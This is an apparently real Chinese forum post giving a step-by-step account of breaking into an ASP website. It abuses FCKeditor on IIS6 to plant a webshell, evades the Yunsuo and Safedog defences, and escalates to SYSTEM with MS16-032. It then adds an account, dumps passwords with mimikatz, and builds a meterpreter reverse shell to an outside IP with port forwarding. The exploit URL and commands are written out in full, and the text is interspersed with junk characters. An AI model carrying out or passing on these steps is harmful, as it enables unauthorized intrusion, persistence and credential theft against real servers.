|
7 h- [, v' b% F# s. w8 j) E& }
4 G: |# g* I; Y. k2 O0 q' t
* j9 g2 T' w+ K4 B e! m 5 T3 r) E. r, c- {. d
|
7 l$ v6 I+ A. ?; J7 Z: I# s- u
$ `* t) k1 Z& v$ l6 ~. A6 ~
" Z. ~. L0 I: x) n2 I" M一、 利用getwebshell篇
" v# ]4 S: p! G" R5 F( Y9 f8 o
6 V9 W- C5 m. i) ~. j首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
7 H9 C" u A _( p! F
4 t5 m* K" O0 L/ u1 q3 \, z
# W% \3 j w4 {. F+ ~4 s- P
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
; X/ F* T- O+ ?1 k
8 [( i! q. ~- T$ @/ e" N下面我们构造一个asp目录,如:
* Q3 }6 _% T. R1 f2 K5 x5 c
& M% l2 ^0 s# ~8 Q* r/ M ; g) c; {3 F X, v2 ?# [
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ' J8 u9 L7 J& Y, y
$ E- o/ h# g/ A 6 R+ o. G% J1 x, D. W
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
/ }" u8 @4 V6 a: B. l
I. a. W- Q' G% g" J
一、 绕过安全狗云锁提权并且加账号
4 z2 Z1 R' O2 q- Q7 G
( q# o% r' O. y( m没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
# d; k& F( D- ^1 f l( t
' b3 d) w e; c如图:
$ |1 _: E; q( y) n
6 w$ U- Z4 V% ^' c' ]1 C9 f
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
; Q* y# I' x7 e6 I; U/ q! z" h1 F
7 g" _: f2 {2 q- Y0 c
一、 利用metasploit
9 Z: F) F. ^, ~# J& Y
# G& s' d( C: Y; s( g6 i2 G6 ~' N
首先用pentestbox生成一个64位的payload如下命令
. e4 O$ z( O! M
; K- s. B- Z& G, ^+ u
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
4 y# L1 b F. K, g) Q# M- Q
6 `3 | }" t4 Y( Y为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
# L4 _' t/ w L
' u$ H; \5 Q7 j# }% C& |下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
& `9 Y; M& l( B: m
* \$ Z! U0 C5 {: L& ~' q4 X# D
下面我们来做一个监听如下命令:
. Y% f# e& o7 W) o" w& @
+ l8 t3 i8 u, o# C7 Sportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
1 L8 O0 p: ?; ~/ U. M' A8 \
: L2 g' Q U2 a
* [) f; Y( g- Q | 5 {- K' _+ t. b/ G- \
8 J, D$ Q; x/ h( r2 R
5 C# e( t; M6 V. p4 i. `1 ~( o( t 3 D6 }* {" m5 B" D/ x, |
6 L! z' t; M- o& m3 s. @
' n' G+ I \# b, K" K3 l
# {2 ~4 U9 A/ n2 q$ R5 d
' D& |9 |( t, s. n2 m- o4 \' L
' W& r" `4 f8 [# @4 w" d2 D( u
* @; ]. t4 o, f
1 _7 Z" M, m; ~8 h; C
1 l5 ]6 ~: }1 |. _4 q5 O- `
" O9 R% _& _9 H' D# Q0 ^% s6 T
; J8 m I& n! k+ L' Q
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06